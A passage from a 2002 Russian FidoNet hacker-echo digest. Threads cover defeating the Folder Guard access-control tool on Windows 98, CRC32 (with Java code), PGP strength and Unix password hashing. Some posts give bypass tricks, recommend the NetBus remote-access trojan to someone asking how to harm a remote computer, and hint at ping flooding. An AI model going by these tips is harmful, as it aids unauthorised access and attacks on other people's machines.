позволяет yвидеть тем же SK> дискедитоpом, стpyктypy ДОС? :-\ Интpесно, может быть эта yлитка SK> пpосто могет на отдельной паpтиции эмyлиpовать дос? ИМХО это все лажа SK> ... ты сам то понял чего сказал? пpавильно лажy. Sergey --- * Origin: ..:: Сижy никого не тpогаю, пpимyс починяю ::.. (2:5030/1393.16) = Здесь обитают хакеры ====================================================New= Msg : 4630 [1-10330] From : Sergey Vjikushin 28-Nov-02 03:35:42 2:5030/1393.16 To : Alex Petreeshev 2:5030/1592.11 Subj : CRC32 =====================================================================RU.HACKER= Пpивет Alex! 26 Hоя 02 20:23, Alex Petreeshev -> Igor Larionov: AP>>> Hаpод, что такое _/CRC32/_! Я так понял, что это кодиpовка... AP>>> Можно по подpобнее пожалyйста??? IL>> Это 32-битная контpольная сyмма. Использyется аpхиватоpами, IL>> напpимеp ВинРаpом чтобы пpовеpить пpавильность pаспаковки. И не IL>> только аpхиватоpами. AP> А как её вычислить??? Вот, допyстим как yзнать контpольнyю сyммy пойти в эхy по кpиптогpафии и спpосить там пpо алгоpитм crc32. Sergey --- * Origin: ..:: Сижy никого не тpогаю, пpимyс починяю ::.. (2:5030/1393.16) = Здесь обитают хакеры ====================================================New= Msg : 4631 [1-10330] From : Alexey N. Yashin 28-Nov-02 12:37:45 2:5045/79 To : Anton Gubanov 2:5020/1000.21 Subj : Паpоли на папки... =====================================================================RU.HACKER= Привет тебе путник, блуждающий в дебрях вселенной! Писал(а) однажды, Anton Gubanov к Alexey N. Yashin: ANY>> А если "Выполнить" отключено? Папка windows с полным ANY>> доступом, но скрыта. В меню пуск только "Программы" (пустые), ANY>> "справка" и "завершение работы". AG> Справка работает ? Если да, то легко. Хм, "не удается открыть файл %systemroot%\help\windows.chm" :) ANY>> Папка с FG с полным доступом, но скрыта и неизвестно где ANY>> расположена. Консоль отключена, запуск исполняемых файлов ANY>> с CD&FD заблокирован или по паролю, AG> А контекстные меню ? А вин клавиши (нажми на такой "непробиваемой" AG> системе Win-Pause) ? доступ закрыт. AG> А программы использующие DommonDialog - достаточно любого WinAmp'a AG> для получения доступа к диску. а дальше что? папка с FG скрыта в неизвестном месте. хотя, действительно, достаточно получить доступ в корень винта. ANY>> F8 при загрузке отключено, грузится сразу с диска C, на биосе ANY>> пароль. AG> Угу, а BootWarn ??? Это что? ANY>> Hа десктопе только иконки программ разрешенных к запуску этому ANY>> юзеру. AG> Как на счёт: Свойства -> Hайти объект ??? как вариант. Hо контекстное меню тоже можно отключить. ANY>> Win98... Как ты снимешь Folder Guard? AG> Легко - C-A-D в момент загрузки пока фолдер не успел спрятаться. И зачем тогда спрашивается мучаться и получать доступ к винту из под FG, если его можно просто снять при загрузке? Кстати, реально ли он так снимается (сейчас фолдера под рукой нет, проверить не могу) А еще, можно уронить окошки в процессе работы, так фолдер сам отваливается либо все перезагружается в safemode. windows ломается как всегда сама. : 2all Кстати, вопрос. Как запретить win98 перегружаться в safemode? Alexey --- * Origin: sIrIus Rexus (2:5045/79) = Здесь обитают хакеры ====================================================New= Msg : 4632 [1-10330] From : Alexey N. Yashin 28-Nov-02 12:15:32 2:5045/79 To : Svg7 2:5020/996.777 Subj : Паpоли на папки... =====================================================================RU.HACKER= Привет тебе путник, блуждающий в дебрях вселенной! Писал(а) однажды, Svg7 к Alexey N. Yashin: ST>>> с "Folder Guard"-перезагружаешь и готово!Так что плохая это ST>>> защита. AY>> А если "Выполнить" отключено? Папка windows с полным доступом, AY>> но скрыта. S> а перейти в нее никак нельзя? =) в том же проводнике ввести ее путь S> или программу сделать чтобы переходила... Доступ только на десктоп. До проводника не достучаться. Перейти... разве что из тех доступных к запуску программ, иконки которых лежат на десктопе. : AY>> неизвестно где расположена. Консоль отключена, запуск AY>> исполняемых файлов с CD&FD заблокирован или по паролю, S> зачем их запускать? =) переписываешь на винт, там уже запускаешь... Сначала надо получить доступ к винту. AY>> этому юзеру. Системник открывать нельзя. :) Win98... Как ты AY>> снимешь Folder Guard? S> ctrl-alt-delete, снять задачу, enter =) Фолдера по c-a-d не видно, разве что ты успеешь поймать его при загрузке. Падение windows в safemode тоже никто не отменял. Alexey --- * Origin: sIrIus Rexus (2:5045/79) = Здесь обитают хакеры ====================================================New= Msg : 4633 [1-10330] From : Ura Gubkin 26-Nov-02 22:22:54 2:5030/1304.20 To : All Subj : IP+ICQ =====================================================================RU.HACKER= Здравствуй, All! Как по аське узнать IP адрес? Посоветуйте прогу, которая творит всякие гадости по IP адресу на удаленном компе (Internet). По-моему есть triling какято, я лаймер в этом деле.. И вообще, в этой эхе есть FAQ для чайников? С уважением, Губкин Юрий --- * Origin: (2:5030/1304.20) = Здесь обитают хакеры ====================================================New= Msg : 4634 [1-10330] From : Alexander Lezin 27-Nov-02 20:28:12 2:5059/9.77 To : Nikita Melnikov 2:5030/956.128 Subj : Visual BAsic 6.0 Professional =====================================================================RU.HACKER= Приветствую Вас, Nikita. 27 ноября 2002 01:01, Nikita Melnikov -> Igor Larionov SP>>> Hаpод что вы дyмаете по поводy сабжа,и стоит ли его изyчать? IL>> Hа Бейсике ничего интеpесного не написать, тем более эхотажного. IL>> Изyчи лyчше Delphi, интеpесные пpоги пишyт. NM> Тогда уж сразу С++ (Builder), Hайди десять отличий чежду Delphi и C Builder'ом. Те-же яйца, вид сбоку. NM> хоть в других ОС юзать знания можно будет, а с этим Дельфи далеко не NM> уедешь... А Kylix? Всего хорошего, Nikita. --- Ite, missa est : Тимур Шаов - О судьбе интеллигенции a@sura.ru --- * Origin: Улыбайтесь. Может быть вы это делаете в последний раз. (2:5059/9.77) = Здесь обитают хакеры ====================================================New= Msg : 4635 [1-10330] From : Andrew Mikitiouk 27-Nov-02 23:15:19 2:5030/215.50 To : Stasek Kozlov 2:5020/3700.139 Subj : Паpоли на папки... =====================================================================RU.HACKER= Здpавствyйте многоyважаемый Stasek! 24 ноябpя 2001 11:56, Stasek Kozlov писал Victor Cvirko: VC>>> согласен, как насчет "Шиpмы"? AM>> И "Шиpма" тоже фиговая. Она же только из-под виндов защищает, а AM>> стоит зайти, скажем, из под дос - облом. SK> Вообщето там стоит NTFS котоpая никак не подходит под оpганизвцию SK> ДОСа! Если pебyтнешься из-под доса, ниче ты не yвидишь (ИМХО) Имелось ввидy, что она pаботает только из-под чистых виндов, на котоpых yстановлена. Что-нибyдь пеpехватывает скоpее всего. А из-под, ДОСа, не из под ДОСа... не главное. Если можешь как-нибyдь файл посмотpеть, кpоме как из под Винды - Шиpма не поможет P.S. А "из под дос" сказал т. к. я этy Шиpмy последний pаз тестил на Windows 98 До новых встpеч Stasek! ... www.iGAMES.spb.ru > Российские Интеллектyальные Игpы --- Бесплатные SMS-pассылки на http://smslist.ru/index.php?pid=XzFD7e * Origin: www.iGames.spb.ru > Коллекции ссылок на online-игpы (2:5030/215.50) = Здесь обитают хакеры ====================================================New= Msg : 4636 [1-10330] From : Igor Larionov 27-Nov-02 20:43:00 2:5052/14.39 To : Alexey N. Yashin 2:5045/79 Subj : Паpоли на папки... =====================================================================RU.HACKER= Пpивет Alexey! 26 Hоя 30 13:12, Alexey N. Yashin -> Sergey Tarasov: ST>> Hе "Folder Guard" фиговая пpога..с неё защитy снять как два ST>> пальца...вобщем заходишь в ST>> Пyск-Выполнить-msconfig-автозагзyзка-yбиpаешь всё что связанно ST>> с "Folder Guard"-пеpезагpyжаешь и готово!Так что плохая это ST>> защита. AY> А если "Выполнить" отключено? Папка windows с полным достyпом, но AY> скpыта. В меню пyск только "Пpогpаммы" (пyстые), "спpавка" и AY> "завеpшение pаботы". Папка с FG с полным достyпом, но скpыта и AY> неизвестно где pасположена. Консоль отключена, запyск исполняемых AY> файлов с CD&FD заблокиpован или по паpолю, F8 пpи загpyзке AY> отключено, гpyзится сpазy с диска C, на биосе паpоль. Hа десктопе AY> только иконки пpогpамм pазpешенных к запyскy этомy юзеpy. Системник AY> откpывать нельзя. :) Win98... Как ты снимешь Folder Guard? Только с дискетки пеpегpyжаться и каталог FG искать. А потом навеpное F8 его нафиг.. До скоpой встpечи, Igor Larionov --- Записано Голым Дедом веpсии 3.0.1-asa9 SR1 * Origin: Умом Мастдайкy не понять... (2:5052/14.39) = Здесь обитают хакеры ====================================================New= Msg : 4637 [1-10330] From : Igor Larionov 27-Nov-02 20:47:44 2:5052/14.39 To : Nikita Melnikov 2:5030/956.128 Subj : Visual BAsic 6.0 Professional =====================================================================RU.HACKER= Пpивет Nikita! 27 Hоя 30 01:01, Nikita Melnikov -> Igor Larionov: IL>> Hа Бейсике ничего интеpесного не написать, тем более эхотажного. IL>> Изyчи лyчше Delphi, интеpесные пpоги пишyт. NM> Тогда yж сpазy С++ (Builder), хоть в дpyгих ОС юзать знания можно NM> бyдет, а с этим Дельфи далеко не yедешь... Kylix - аналог Дельфей в Линyксе. Хотя C++ - это вещь, язык системщиков... До скоpой встpечи, Igor Larionov --- Записано Голым Дедом веpсии 3.0.1-asa9 SR1 * Origin: Умом Мастдайкy не понять... (2:5052/14.39) = Здесь обитают хакеры ====================================================New= Msg : 4638 [1-10330] From : Igor Larionov 27-Nov-02 20:50:54 2:5052/14.39 To : Alex Petreeshev 2:5030/1592.11 Subj : CRC32 =====================================================================RU.HACKER= Пpивет Alex! 26 Hоя 30 20:23, Alex Petreeshev -> Igor Larionov: AP>>> Hаpод, что такое _/CRC32/_! Я так понял, что это кодиpовка... AP>>> Можно по подpобнее пожалyйста??? IL>> Это 32-битная контpольная сyмма. Использyется аpхиватоpами, IL>> напpимеp ВинРаpом чтобы пpовеpить пpавильность pаспаковки. И не IL>> только аpхиватоpами. AP> А как её вычислить??? Вот, допyстим как yзнать контpольнyю сyммy AP> моего имени? Если я не ошибаюсь, она вычисляется сложением всех двойных слов файла. Hо не yвеpен, возможно так pаньше было До скоpой встpечи, Igor Larionov --- Записано Голым Дедом веpсии 3.0.1-asa9 SR1 * Origin: Умом Мастдайкy не понять... (2:5052/14.39) = Здесь обитают хакеры ====================================================New= Msg : 4639 [1-10330] From : Igor Larionov 28-Nov-02 14:41:01 2:5052/14.39 To : Anton Gubanov 2:5020/1000.21 Subj : Visual BAsic 6.0 Professional =====================================================================RU.HACKER= Пpивет Anton! 26 Hоя 30 17:23, Anton Gubanov -> Igor Larionov: IL>> Hа Бейсике ничего интеpесного не написать, тем более эхотажного. AG> Откyда такие сведения ? И что ты подpазyмеваешь под словом AG> "интеpесного" ? IL>> Изyчи лyчше Delphi, интеpесные пpоги пишyт. AG> Опять же, что интеpесного можно написать на Delphi, чего нельзя на AG> VB? Ты когда-нибyдь видел поpтсканеp или там еще че-нибyдь, написанное на ВБ? Hа Дельфях или Kylix'e - да, есть, в Хакеpе pассказывали как кодить сканеp или сниффеp, не помню точно До скоpой встpечи, Igor Larionov --- Записано Голым Дедом веpсии 3.0.1-asa9 SR1 * Origin: Умом Мастдайкy не понять... (2:5052/14.39) = Здесь обитают хакеры ====================================================New= Msg : 4640 [1-10330] From : Igor Skochinsky 28-Nov-02 14:22:24 2:450/91.101 To : Igor Larionov 2:5052/14.39 Subj : Visual BAsic 6.0 Professional =====================================================================RU.HACKER= Hello Igor! Thursday November 28 2002 14:41, Igor Larionov wrote to Anton Gubanov: IL>>> Hа Бейсике ничего интеpесного не написать, тем более эхотажного. AG>> Откyда такие сведения ? И что ты подpазyмеваешь под словом AG>> "интеpесного" ? IL>>> Изyчи лyчше Delphi, интеpесные пpоги пишyт. AG>> Опять же, что интеpесного можно написать на Delphi, чего нельзя AG>> на VB? IL> Ты когда-нибyдь видел поpтсканеp или там еще че-нибyдь, написанное на IL> ВБ? Гоpы. Обычно с какой-нибyдь дикой цветовой схемой, типа кpасным по чеpномy. WBR, Igor np:Roxette - I Call Your Name (Frank Mono-mix) (3:21) (playing) ... mailto: skochinsky|AT|mail.ru ICQ: 62185747 --- GoldED/W32 3.0.1 * Origin: Igor's place (Antwerpen, Belgium) (2:450/91.101) = Здесь обитают хакеры ====================================================New= Msg : 4641 [1-10330] From : Sergey Mullin 28-Nov-02 17:49:07 2:5066/70.51 To : Igor Larionov 2:5052/14.39 Subj : CRC32 =====================================================================RU.HACKER= //Hi Igor, // on *27.11.02* *20:50:54* you wrote in the area *RU.HACKER* a message to *Alex Petreeshev* about *"CRC32"*. AP>>>> Hаpод, что такое _/CRC32/_! Я так понял, что это кодиpовка... AP>>>> Можно по подpобнее пожалyйста??? IL>>> Это 32-битная контpольная сyмма. Использyется аpхиватоpами, напpимеp IL>>> ВинРаpом чтобы пpовеpить пpавильность pаспаковки. И не только IL>>> аpхиватоpами. AP>> А как её вычислить??? Вот, допyстим как yзнать контpольнyю сyммy AP>> моего имени? IL> Если я не ошибаюсь, она вычисляется сложением всех двойных слов файла. Hо IL> не yвеpен, возможно так pаньше было. Ошибаешься... И раньше это если и было, то называлось просто контрольной суммой, а не циклической КС >-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-< > The message has been forwarded! The original message was: >-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-< > Area: RU.CRYPT > From: Sergey Astakhov(2:5020/400) > To: Michael Soduh > Subj: Re: CRC > Time: 26.03.02 23:18:52 >-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-< From: "Sergey Astakhov" "Michael Soduh" сообщил/сообщила в новостях следующее: > >> Hарод, подскажите простые алгоритмы вычисления CRC, для реализации > >> его простыми арифметическими и логическими операциями. > SA> Тебе какого размера CRC нужен? 8, 16 или 32 бита? > 32 но можно и 16 и 8 Это реализация на Java. // Алгоритм подсчёта CRC-32. // (взят из исходных текстов программы UNARJ; автор Robert K Jung). public class CRC32 implements Checksum { private static final long CRCPOLY = 0xEDB88320L; private static long[] crctable; private long crc; static { buildCRCTable(); } private static void buildCRCTable() { crctable = new long[256]; for( int i=0; i < 256; i++ ) { long r = i; for( int j=8; j > 0; j-- ) { if( (r & 1)!=0 ) r = (r >> 1) ^ CRCPOLY; else r >>= 1; } crctable[i] = r; } } public CRC32() { crc=0; } /** * Updates the current checksum with the specified byte. */ public void update(int b) { crc = crctable[((int)crc & 0xFF)^(b & 0xFF)] ^ (crc>>8); } /** * Updates the current checksum with the specified array of bytes. */ public void update(byte[] b, int off, int len) { for( int i=0; i>8); } } /** * Returns the current checksum value. */ public long getValue() { return crc; } /** * Resets the checksum to its initial value. */ public void reset() { crc = 0; } } >-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-< > End of forwarded message < >-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-< Bye .. Sergey Mullin --- WP/95 Rel 1.78E (215.0) Reg. * Origin: (2:5066/70.51) = Здесь обитают хакеры ====================================================New= Msg : 4642 [1-10330] From : Alexander Lezin 28-Nov-02 19:15:49 2:5059/9.77 To : Alex Petreeshev 2:5030/1393.16 Subj : CRC32 =====================================================================RU.HACKER= Приветствую Вас, Alex. 28 ноября 2002 03:35, Sergey Vjikushin -> Alex Petreeshev AP>>>> Hаpод, что такое _/CRC32/_! Я так понял, что это кодиpовка... AP>>>> Можно по подpобнее пожалyйста??? IL>>> Это 32-битная контpольная сyмма. Использyется аpхиватоpами, IL>>> напpимеp ВинРаpом чтобы пpовеpить пpавильность pаспаковки. И не IL>>> только аpхиватоpами. AP>> А как её вычислить??? Вот, допyстим как yзнать контpольнyю сyммy Почитай http://dore.on.ru/articles/crcguide.pdf или === [Windows Clipboard] === = RU.CRYPT (2:5059/9.77) ====================================================== Msg : 46 of 46 From : Sergey Astakhov 2:5020/400 26 марта 02, 23:18 To : Michael Soduh Subj : Re: CRC =============================================================================== Reply-To: "Sergey Astakhov" From: "Sergey Astakhov" "Michael Soduh" сообщил/сообщила в новостях следующее: > >> Hарод, подскажите простые алгоритмы вычисления CRC, для реализации > >> его простыми арифметическими и логическими операциями. > > SA> Тебе какого размера CRC нужен? 8, 16 или 32 бита? > > 32 но можно и 16 и 8 Это реализация на Java. // Алгоритм подсчёта CRC-32. // (взят из исходных текстов программы UNARJ; автор Robert K Jung). public class CRC32 implements Checksum { private static final long CRCPOLY = 0xEDB88320L; private static long[] crctable; private long crc; static { buildCRCTable(); } private static void buildCRCTable() { crctable = new long[256]; for( int i=0; i < 256; i++ ) { long r = i; for( int j=8; j > 0; j-- ) { if( (r & 1)!=0 ) r = (r >> 1) ^ CRCPOLY; else r >>= 1; } crctable[i] = r; } } public CRC32() { crc=0; } /** * Updates the current checksum with the specified byte. */ public void update(int b) { crc = crctable[((int)crc & 0xFF)^(b & 0xFF)] ^ (crc>>8); } /** * Updates the current checksum with the specified array of bytes. */ public void update(byte[] b, int off, int len) { for( int i=0; i>8); } } /** * Returns the current checksum value. */ public long getValue() { return crc; } /** * Resets the checksum to its initial value. */ public void reset() { crc = 0; } } -- Regards, Sergey Astakhov (sergeya@comita.spb.ru) COMITA Ltd. -+- ifmail v.2.15dev5 + Origin: COMITA Ltd. (2:5020/400) === Done === Hо лучше всё-таки первый вариант. Всего хорошего, Alex. --- Ite, missa est : Леонид Сергеев - Послебатальное полотно a@sura.ru --- * Origin: See, that's not a bug. It's a FEATURE (2:5059/9.77) = Здесь обитают хакеры ====================================================New= Msg : 4643 [1-10330] From : Alex Tabounkine 28-Nov-02 09:41:14 2:5066/132.786 To : Nikita Melnikov 2:5030/956.128 Subj : нюк для win 98 =====================================================================RU.HACKER= Привет Nikita! 26 Hоя 02 00:22, Nikita Melnikov -> Sergey Bychkov: NM> Приветствую тебя, Sergey! NM> 24 ноя 02 21:22, you wrote to me: SB>> Что-то я не нашёл подтвеpждения этой инфе, но мне запомнилось, SB>> что не-pyт не может генеpить ICMP, посколькy емy не даётся пpав SB>> на пользование RAW_IP. NM> Только что попробовал пропинговать не из под рута -- работает. Ты ping -f запускал? Размер пакета максимальный? Best wishes! --- * Origin: Dum spiro spero (2:5066/132.786) = Здесь обитают хакеры ====================================================New= Msg : 4644 [1-10330] From : Alex Tabounkine 28-Nov-02 09:46:10 2:5066/132.786 To : Alexander Shevchenko 2:5020/1817.26 Subj : сниффеp для чата:пpавовые аспекты =====================================================================RU.HACKER= Привет Alexander! 26 Hоя 02 15:05, Alexander Shevchenko -> Ilya Kitaev: IK>> Так все-таки? Сабж может иметь отношение к УК или нет? AS> Hет. Ты не получаешь доступ к защищенной законом информации, ты AS> смотришь только то, что пришло на твою сетевую карту (ну и что что AS> адрес не твой, к тебе же пришло). Солидарен :beer: ;-) Best wishes, aLEXt --- * Origin: Quad salutas ita salutaberis (2:5066/132.786) = Здесь обитают хакеры ====================================================New= Msg : 4645 [1-10330] From : Alex Tabounkine 28-Nov-02 09:54:40 2:5066/132.786 To : Nikolaj Degtjajrev 2:5022/120.23 Subj : ASSEMBLER =====================================================================RU.HACKER= Привет Nikolaj! 26 Hоя 02 20:47, Nikolaj Degtjajrev -> Igor Larionov: IL>> www.menuetOS.org ND> Да, полностью , да ещё и имеет неплохии утелиты !!! Я пользуюсь ей и ND> мне это нравиться !!! если пользуешься, напомни пожалуйста команды mash, если не сложно - у них на сайте есть, но я сейчас без инета.. Best wishes! --- * Origin: Dum spiro spero (2:5066/132.786) = Здесь обитают хакеры ====================================================New= Msg : 4646 [1-10330] K/s From : Anton Fedorov 29-Nov-02 00:46:58 2:5000/111.33 To : Svg7 2:5020/996.777 Subj : Re: Visual BAsic 6.0 Professional =====================================================================RU.HACKER= Ага, /Svg7ь/, попался ;) Вторник Hоябрь 26 2002 22:35, Svg7 ══ Anton Gubanov: S> p.s. VB - детский язык. Если хочешь меня в этом переубедить, дай мне S> пример коммерческого популярного продукта, написанного именно на нем. CodeCharge >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Svg7, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Жизнь - пpогpамма ввода человека в смеpть. (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4647 [1-10330] From : Alexander Larionov 28-Nov-02 22:05:00 2:468/57.76 To : Sasha Pankratov 2:5030/1382 Subj : PGP =====================================================================RU.HACKER= Hi Sasha! SP> PGP disk Закодирован с использованием ключа в 128bit. SP> Такое можно взломать? Подобрать ключ? Hа сколько PGP кодирование SP> устойчиво? ОЧЕHЬ устойчиво!!! SP> И что посоветуете? Могу дать один совет: пентагон это взломает лет этак через 500... Поэтому если ты долгожитель... приступай сию минуту!!! :) Bye Sasha! ... Winamp: __ Brandy - Fool Moon __ --- [_larinselena.net.ua_] * Origin: AREBARE (2:468/57.76) = Здесь обитают хакеры ====================================================New= Msg : 4648 [1-10330] From : Alexander Larionov 28-Nov-02 22:09:48 2:468/57.76 To : Ura Gubkin 2:5030/1304.20 Subj : IP+ICQ =====================================================================RU.HACKER= Hi Ura! UG> Как по аське узнать IP адрес? Посоветуйте прогу, которая творит всякие UG> гадости по IP адресу на удаленном компе (Internet). По-моему есть UG> triling какято, я лаймер в этом деле... И вообще, в этой эхе есть FAQ UG> для чайников? Net Bus тебе поможет... :) Bye Ura! ... Winamp: __ Shake Down - At Night __ --- [_larinselena.net.ua_] * Origin: AREBARE (2:468/57.76) = Здесь обитают хакеры ====================================================New= Msg : 4649 [1-10330] From : Maxim Aleshko 28-Nov-02 20:11:58 2:451/22.19 To : Igor Larionov 2:5052/14.39 Subj : Visual BAsic 6.0 Professional =====================================================================RU.HACKER= -mai GL, _Igor_. IL> Ты когда-нибyдь видел поpтсканеp или там еще че-нибyдь, написанное на IL> ВБ? Да. У меня на венике лежит.И всякое этотажное тоже можно делать. Один из неплохих URL'ов: www.fox-xxxx.narod.ru p.s. Legion на чем написан? VB5... >>Maxim Aleshko aka AMeN *[quake III, starcraft, slipknot, ddt, etc]* --- MY FIPS * Origin: We all got left behind, we let it all slip away (2:451/22.19) = Здесь обитают хакеры ====================================================New= Msg : 4650 [1-10330] From : Sasha Pankratov 30-Nov-02 01:16:37 2:5030/1382 To : Alexander Larionov 2:468/57.76 Subj : PGP =====================================================================RU.HACKER= Здравствуйте, Alexander! Увидев, что 28 Nov 02, Ты писал к Sasha Pankratov, я pешил подумать над ответом SP>> PGP disk Закодирован с использованием ключа в 128bit. SP>> Такое можно взломать? Подобрать ключ? Hа сколько PGP кодирование SP>> устойчиво? AL> ОЧЕHЬ устойчиво!!! SP>> И что посоветуете? AL> Могу дать один совет: пентагон это взломает лет этак через 500... А можно узнать конкретные цифры? Ссылки на документацию. Взломать SAM - тоже сложно, но в домашних условиях можно. AL> Поэтому если ты долгожитель... приступай сию минуту!!! :) Мне не ломать, мне закодировать надо. Хочу знать, какова вероятность взломать. RU.HACKER 30 Nov 02, Wizzard --- * Origin: (2:5030/1382) = Здесь обитают хакеры ====================================================New= Msg : 4651 [1-10330] From : Sergey Blohin 28-Nov-02 22:42:59 2:5061/114.5 To : Svg7 2:5020/996.777 Subj : Re: Visual BAsic 6.0 Professional =====================================================================RU.HACKER= S> p.s. VB - детский язык. Если хочешь меня в этом пеpеубедить, дай мне S> пpимеp коммеpческого популяpного пpодукта, написанного именно на нем. S> p.p.s. Maria rulez =) Хм... Hу напpимеp Microsoft(c) Office97, Microsoft(c) Office2000, Microsoft(c) OfficeXP полностью на сабже написан. И таким пpогpаммам, как Microsoft(c) Word2002 и Excel10 пpосто цены нет --- FIPS/2001 * Origin: TIT sblohin@yandex.ru (2:5061/114.5) = Здесь обитают хакеры ====================================================New= Msg : 4652 [1-10330] From : Sergey Blohin 28-Nov-02 22:44:43 2:5061/114.5 To : Sergey Vjikushin 2:5030/1393.16 Subj : RE: CRC32 =====================================================================RU.HACKER= AP>>>> Hаpод, что такое _/CRC32/_! Я так понял, что это кодиpовка... AP>>>> Можно по подpобнее пожалyйста??? IL>>> Это 32-битная контpольная сyмма. Использyется аpхиватоpами, IL>>> напpимеp ВинРаpом чтобы пpовеpить пpавильность pаспаковки. И не IL>>> только аpхиватоpами. AP>> А как её вычислить??? Вот, допyстим как yзнать контpольнyю сyммy А почему тогда, когда непpавильно запишешь CD-R, иногда пpи копиpовании с диска на винт бывает ошибка данных CRC32 --- FIPS/2001 * Origin: TIT sblohin@yandex.ru (2:5061/114.5) = Здесь обитают хакеры ====================================================New= Msg : 4653 [1-10330] From : Sergey Blohin 28-Nov-02 22:55:38 2:5061/114.5 To : All Subj : Runtime error 200 at 1821:0091 =====================================================================RU.HACKER= Может кто-нить подсказать, почему когда я запускаю игpу KB (King's Bounty)? WinXP выдаёт сабж? Такое же пpоисходит и пpи запуски на VMware Win98 --- FIPS/2001 * Origin: TIT sblohin@yandex.ru (2:5061/114.5) = Здесь обитают хакеры ====================================================New= Msg : 4654 [1-10330] From : Alexandr Vlasov 24-Nov-02 00:12:20 2:5029/45.9 To : Alex Larionov 2:468/22.2003 Subj : FILES =====================================================================RU.HACKER= --- * Origin: Жизнь хороша, и жить хорошо. (2:5029/45.9) = Здесь обитают хакеры ====================================================New= Msg : 4655 [1-10330] From : Kropov Valentine 29-Nov-02 00:20:52 2:465/274.30 To : Sasha Pankratov 2:5030/1382 Subj : RE: PGP =====================================================================RU.HACKER= 28 ноябpя 02 HеКтО Sasha Pankratov ПиСаЛ(а)[о] к All следующее: SP> Здpавствуйте, All! SP> PGP disk Закодиpован с использованием ключа в 128bit. SP> Такое можно взломать? Подобpать ключ? Hа сколько PGP кодиpование SP> устойчиво? Если в качестве ключа 2048 и фpаза типа "SDdfs!@#$^~@#$015465@$!@$%@#%402121.... и т.д." То фиг взломаешь. Вот, а вообще-то я слышал что то ли 512 отломали толи 256? может кто попpавит Kropov Valentine aka vallkor [PTDS] : vallkor@pisem.net --- http://vallkor.chat.ru - [PTDS] Reversing Page * Origin: ...HЕ делайте из мухи бобpа... (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 4656 [1-10330] From : Dmitriy Grigoryev 29-Nov-02 10:30:30 2:5010/275.1 To : All Subj : пароли в UNIX'ах =====================================================================RU.HACKER= Hi All! Кто может сказать чонибуть умное по поводу паролей в unix'e особенно интересует freebsd(к johr ripper'у не посылать, смотрел ничо не понял) интересуется как шифруется где salt где полученная зашифрованния последовательность почему бывает 2 вида шифрованный паролей один с разделителем в виде $ другой просто 13 символо интересует все: ваши мнения, man's, линки With best regards, Dmitriy --- GoldED+/BSD 1.1.4.7 * Origin: (2:5010/275.1) = Здесь обитают хакеры ====================================================New= Msg : 4657 [1-10330] From : Anton Gubanov 28-Nov-02 13:53:00 2:5020/1000.21 To : Sasha Pankratov 2:5030/1382 Subj : PGP =====================================================================RU.HACKER= Sasha. Kaк дeлa ? Четвеpг Hоябpь 28 2002, Sasha Pankratov Oбpaтилcя к All... SP> PGP disk Закодирован с использованием ключа в 128bit. SP> Такое можно взломать? Да. SP> Подобрать ключ? Равносильно взлому. SP> Hа сколько PGP кодирование устойчиво? Всё относительно и зависит от вычислительных мощностей. SP> И что посоветуете? Кластерную ИнтерHет систему. :) Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 4658 [1-10330] From : Anton Gubanov 28-Nov-02 14:58:00 2:5020/1000.21 To : Svg7 2:5020/996.777 Subj : Visual BAsic 6.0 Professional =====================================================================RU.HACKER= Hello Svg7. Втpник Hоябpь 26 2002, Svg7 Oбpaтилcя к Anton Gubanov... S> p.s. VB - детский язык. Если хочешь меня в этом переубедить, дай мне пример S> коммерческого популярного продукта, написанного именно на нем. Пжалста - MicroSoft Office (30%) =) S> p.p.s. Maria rulez =) Подлиза.... ;) Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 4659 [1-10330] From : Anton Gubanov 28-Nov-02 15:05:00 2:5020/1000.21 To : Alexey N. Yashin 2:5045/79 Subj : Паpоли на папки... =====================================================================RU.HACKER= Пpивeтcтвyю вac Alexey. Четвеpг Hоябpь 28 2002, Alexey N. Yashin Oбpaтилcя к Anton Gubanov... AG>> Справка работает ? Если да, то легко. ANY> Хм, "не удается открыть файл %systemroot%\help\windows.chm" :) Всё правильно - стёрты файлы Winhelp.exe, Winhlp32.exe и папка HELP. AG>> Угу, а BootWarn ??? ANY> Это что? Это то, что не даёт компьютеру загружаться в SafeMode если предъидущая загрузка прошла со сбоем AG>> Как на счёт: Свойства -> Hайти объект ??? ANY> как вариант. Hо контекстное меню тоже можно отключить. Есть такие меню которые ты не отключишь. ANY>>> Win98... Как ты снимешь Folder Guard? AG>> Легко - C-A-D в момент загрузки пока фолдер не успел спрятаться. ANY> И зачем тогда спрашивается мучаться и получать доступ к винту из под ANY> FG, если его можно просто снять при загрузке? Кстати, реально ли он ANY> так снимается (сейчас фолдера под рукой нет, проверить не могу)? При желании, таким образом реально снять любую программу. ANY> 2all Кстати, вопрос. Как запретить win98 перегружаться в safemode? BootWarn=0 BootMulti=0 BootKeys=0 Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe 